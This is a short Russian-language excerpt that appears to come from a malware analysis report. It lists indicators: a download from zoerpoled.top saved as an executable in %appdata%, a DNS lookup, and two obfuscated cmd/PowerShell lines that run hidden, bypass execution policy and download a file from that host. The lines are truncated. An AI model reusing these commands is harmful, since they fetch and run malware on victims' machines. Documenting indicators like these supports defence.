Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pow^ERsHELl.exE -E^X^ecuTI^O^np^O^lICy^ ^bY^P^AsS ^-n^Op^ro^fI^le -^WINDOWstyl^e hIDdeN ^(NEW-ObjE^Ct S^Ys^TEM.N^E^t.WEBCli^E^Nt^)^.dOwNl^O^a^dFilE(^'http://www.zoerpoled....
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "pow^ERsHELl.exE -E^X^ecuTI^O^np^O^lICy^ ^bY^P^AsS ^-n^Op^ro^fI^le -^WINDOWstyl^e hIDdeN ^(NEW-ObjE^Ct S^Ys^TEM.N^E^t.WEBCli^E^Nt^)^.dOwNl^O^a^dFilE(^'http://www.zoerpoled....' (со скрытым окном)